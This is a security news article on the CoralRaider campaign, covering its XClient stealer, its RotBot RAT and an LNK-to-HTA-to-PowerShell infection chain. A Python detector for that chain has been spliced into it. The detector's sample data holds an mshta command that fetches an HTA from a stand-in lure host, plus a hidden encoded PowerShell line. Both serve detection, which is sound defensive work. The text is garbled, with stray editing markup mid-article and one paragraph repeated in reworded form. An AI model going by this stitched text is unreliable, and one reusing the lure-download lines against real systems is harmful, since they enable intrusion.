Sunday, July 21, 2024

CoralRaider Hackers Steal Login Credentials, Financial Data & Social Media Logins

A new threat actor dubbed “CoralRaider” targets victims’ financial information, login credentials, and social media profiles—including accounts for businesses and advertisements.

The group, which is of Vietnamese origin, has been active since at least 2023 and targets victims in several Asian and Southeast Asian countries. 

In the recent campaign, the attackers used XClient stealer and RotBot, a customized version of QuasarRAT, as payloads.

RotBot, a remote access tool (RAT), runs several checks on the victim’s computer, including its IP address, ASN, and active processes, in order to evade detection.

The XClient stealer has extensive information-stealing capabilities through its plugin module, along with a variety of modules for remote administration operations.


Notable Tactics, Techniques, And Procedures (TTPs) Employed

According to Cisco Talos reports, the attacker utilized two Telegram bots: a “debug” bot for debugging and an “online” bot for receiving victim data. 

The “debug” bot’s desktop image and Telegram profile, however, looked identical to those of the “online” bot.

This suggests that the actor may have compromised their own environment while testing the bot.

Telegram bots used by the attackers

Researchers’ investigation turned up two more pictures that showed several OneDrive folders. 

Another picture showed an Excel file that most likely contained the victims’ data; the spreadsheet contains multiple tabs in Vietnamese.

“CoralRaider had hardcoded Vietnamese words in several stealer functions of their payload XClient stealer”, Talos researchers shared with Cyber Security News.
</gra_replace>
<gr_replace lines="41" cat="clarify" orig="The Windows shortcut file serves">
A Windows shortcut (LNK) file serves as the campaign’s initial vector. How the actor delivers the LNKs to victims is currently unknown.

“The stealer function maps the stolen victim’s information to hardcoded Vietnamese words and writes them to a text file on the victim machine’s temporary folder before exfiltration”.

This malicious campaign is aimed at victims in South Korea, Bangladesh, Pakistan, Indonesia, Vietnam, India, China, and other countries in Asia and Southeast Asia. 

The Windows shortcut file serves as the campaign’s original vector. The actor’s method of giving the victims the LNKs is unknown at the moment.

Attack Flow

The attack begins with a malicious Windows shortcut file that downloads and launches an HTML application (HTA) file from a download site under the attacker’s control.

When the HTA file is opened, an embedded, obfuscated Visual Basic script runs.

The malicious Visual Basic script loads a PowerShell script into memory, which decrypts and sequentially runs three further PowerShell scripts. These download and launch RotBot, disable Windows and application notifications, bypass User Account Control (UAC), and perform anti-VM and anti-analysis checks.

RotBot is downloaded to the victim’s computer and launched under the guise of the Print Spooler program “spoolsv.exe.” The threat actor compiled and customized this RotBot build specifically for this campaign.

The XClient stealer steals victims’ browser data, credit card numbers, and social media login credentials.

It targets the data files of the Chrome, Microsoft Edge, Opera, Brave, CocCoc, and Firefox browsers via the absolute paths of their respective installations.

Lastly, the XClient stealer gathers the victim’s social media information into a text file in the local user profile’s temporary folder and packages it into a ZIP archive.
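Two of the behaviours in the attack flow above are easy to check for in endpoint telemetry: an `mshta.exe` process spawning PowerShell (the HTA-to-VBScript-to-PowerShell step) and a process named `spoolsv.exe` running from anywhere other than System32 (the RotBot disguise). The following detector is an added example, not code from the article or from Talos; the Sysmon-style event fields, PIDs and file paths are constructed sample data.

```python
# Added example: flag the process-creation patterns described in the article.
# Event shape and sample telemetry are assumptions, not real victim data.
from dataclasses import dataclass
from pathlib import PureWindowsPath

@dataclass
class ProcEvent:
    pid: int
    ppid: int        # parent process id
    image: str       # full path of the newly created process
    cmdline: str

# Location of the genuine Print Spooler binary on a default Windows install.
LEGIT_SPOOLSV = PureWindowsPath(r"C:\Windows\System32\spoolsv.exe")

def masquerading_spoolsv(ev: ProcEvent) -> bool:
    """True if a process calls itself spoolsv.exe but does not run from System32."""
    p = PureWindowsPath(ev.image)
    # PureWindowsPath comparison is case-insensitive, as NTFS paths are.
    return p.name.lower() == "spoolsv.exe" and p != LEGIT_SPOOLSV

def hta_to_powershell_chains(events):
    """Return (mshta_pid, powershell_pid) pairs where mshta.exe spawned PowerShell."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        child = PureWindowsPath(e.image).name.lower()
        parent = by_pid.get(e.ppid)
        if child in ("powershell.exe", "pwsh.exe") and parent is not None \
                and PureWindowsPath(parent.image).name.lower() == "mshta.exe":
            hits.append((parent.pid, e.pid))
    return hits

# Constructed sample telemetry mirroring the described chain, plus one benign spooler.
SAMPLE = [
    ProcEvent(400, 300, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(410, 400, r"C:\Windows\System32\mshta.exe", 'mshta.exe "http://lure.example/lure.hta"'),
    ProcEvent(420, 410, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell -w hidden -enc ..."),
    ProcEvent(430, 420, r"C:\Users\victim\AppData\Local\Temp\spoolsv.exe", "spoolsv.exe"),
    ProcEvent(900, 600, r"C:\Windows\System32\spoolsv.exe", "spoolsv.exe"),
]

def findings(events=SAMPLE):
    """Summarise both detections over a list of process events."""
    return {
        "masquerading_spoolsv": [e.pid for e in events if masquerading_spoolsv(e)],
        "hta_powershell_chains": hta_to_powershell_chains(events),
    }

if __name__ == "__main__":
    print(findings())
```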

Use secure passwords and change them frequently to protect yourself from these dangerous attacks.


Guru baran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.
